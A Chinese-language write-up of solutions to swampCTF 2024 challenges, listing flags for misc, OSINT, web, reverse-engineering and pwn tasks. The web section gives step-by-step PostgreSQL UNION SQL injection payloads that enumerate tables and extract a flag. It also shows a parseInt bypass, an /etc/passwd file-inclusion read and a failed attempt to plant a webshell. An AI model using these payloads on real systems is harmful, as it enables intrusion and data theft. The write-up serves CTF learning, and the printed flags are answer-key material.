swampCTF 2024

swampCTF 2024

MISC

Discord Challenge

swampCTF{w3lc0m3_t0_th3_swamp}

What the Form

google form不停重定向，直接F12看一下。flag就在前端。

swampCTF{F0rm5_K33p5_D4T4_H1dd3n}

OSINT

Lost in Space

图片是旅行者2号，问距离地球多少个天文单位。

136

Aerial Attack

解析图片exif信息，即可获得GPS坐标，按照规则构造即可。

(29.64,-82.33)

WEB

Potion Seller

看了hint是提示wtfjs，查看wtfjs文档的parseInt和Number部分，尝试了几个例子，发现1/1999999可以随意清空贷款绕过检查。

https://github.com/denysdovhan/wtfjs/blob/master/README-zh-cn.md

首先通过/borrow?amount=999999借入一定数量的金币。

然后在还款的时候利用repay?amount=1%20/%201999999绕过检测，实现贷款还款。

最后/checkout获得flag

BrailleDB-1

searchText处存在sql注入漏洞，尝试利用，却发现不存在database()函数，考虑不是mysql。

通过查询version，得知后端数据库是postgreSQL数据。

Q: searchText=-1' union select current_database()--
R: brailleDB

Q:searchText=-1' union select relname from pg_stat_user_tables--
R: braille

Q: searchText=-1' union select column_name from information_schema.columns where table_name='braille'--
R: braille_representation

结合burp fuzzing offset位来读取列
Q: searchText=-1' union select relname from pg_stat_user_tables offset 1--
R: flag

有flag列和id列
Q:searchText=-1' union select column_name from information_schema.columns where table_name='flag' offset 0--
R: flag
Q:searchText=-1' union select column_name from information_schema.columns where table_name='flag' offset 1--
R: id

最后payload:

searchText=-1' union select flag from flag offset 0--

swampCTF{Un10n_A11_Th3_W4yyy!}

UnderConstruction

page参数，猜测可以任意文件读取。果然可以成功读取了/etc/passwd，读不了源码，会被直接解析。

登录处有sql注入漏洞，但是数据库中没有找到flag。考虑用sql注入读文件先读源码看看，限制了报错注入的字符回显长度，只能结合burp来慢慢获取源码。

index.php

<?php
ini_set('display_errors', 0);
if (isset($_GET['page']) {
    include("/var/www/html/".$_GET['page']);
} else { header('HTTP/1.1 301 Moved Permenently');
    header('Location: /?page=under_construction.php');
}
?>

果然是文件包含漏洞，所以应该考虑sql注入写webshell，然后文件包含执行。

/etc/mysql/mariadb.conf.d/50-server.cnf

# # These groups are read by MariaDB server. 
# Use it for options that only the server (but not clients) should see # this is read by the standalone daemon and embedded servers [server] 
# this is only for the mysqld standalone daemon [mysqld] 
# # * Basic Settings 
# user = mysql 
pid-file = /run/mysqld/mysqld.pid 
basedir = /usr 
datadir = /var/lib/mysql 
tmpdir = /tmp 
lc-messages-dir = /usr/share/mysql 
lc-messages = en_US skip-external-locking 
# Broken reverse DNS slows down connections considerably and name resolve is 
# safe to skip if there are no "host by domain name" access grants 
#skip-name-resolve 
# Instead of skip-networking the default is now to listen only on 
# localhost which is more compatible and is not less secure. 
bind-address = 127.0.0.1 
# # * Fine Tuning 
# #key_buffer_size = 128M 
#max_allowed_packet = 1G 
#thread_stack = 192K 
#thread_cache_size = 8 
# This replaces the startup script and checks MyISAM tables if needed 
# the first time they are touched 
#myisam_recover_options = BACKUP 
#max_connections = 100 
#table_cache = 64 
# # * Logging and Replication 
# # Both location gets rotated by the cronjob. # Be aware that this log type is a performance killer. 
# Recommend only changing this at runtime for short testing periods if needed! #general_log_file = /var/log/mysql/mysql.log 
#general_log = 1 
# When running under systemd, error logging goes via stdout/stderr to journald 
# and when running legacy init error logging goes to syslog due to 
# /etc/mysql/conf.d/mariadb.conf.d/50-mysqld_safe.cnf 
# Enable this if you want to have error logging into a separate file 
#log_error = /var/log/mysql/error.log 
# Enable the slow query log to see queries with especially long duration #slow_query_log_file = /var/log/mysql/mariadb-slow.log 
#long_query_time = 10 
#log_slow_verbosity = query_plan,explain 
#log-queries-not-using-indexes 
#min_examined_row_limit = 1000 
# The following can be used as easy to replay backup logs or for replication. 
# note: if you are setting up a replication slave, see REA

但是写文件没有成功，不管是webroot还是/tmp都没有成功。感觉应该是得写文件，然后文件包含执行shell。虽然没做出来但是也记录一下了。

RE

Beginner Rev

做异或运算，那么找一下byte_402010

这里的32个字节的字符。用python写一个脚本跑一下：

from Crypto.Util.number import *
codes = [0x32, 0x36, 0x20, 0x2C, 0x31, 0x2, 0x15, 0x7, 0x3A, 0x19, 0x71, 0x13, 0x1E, 0x28, 0x2F, 0x37, 0x71, 0x2D, 0x34, 0x35, 0x28, 0x71, 0x2F, 0x1E, 0x28, 0x74, 0x1E, 0x22, 0x71, 0x71, 0x2D, 0x3C]
result = ""
for i in codes:
    result += long_to_bytes(i^0x41).decode()
print(result)

swampCTF{X0R_inv0luti0n_i5_c00l}

PWN

Beginner Pwn 1

数组越界，内存溢出破坏其他变量。从而让自己成为admin。

swampCTF{y0u_@r3_a_h@ck3r}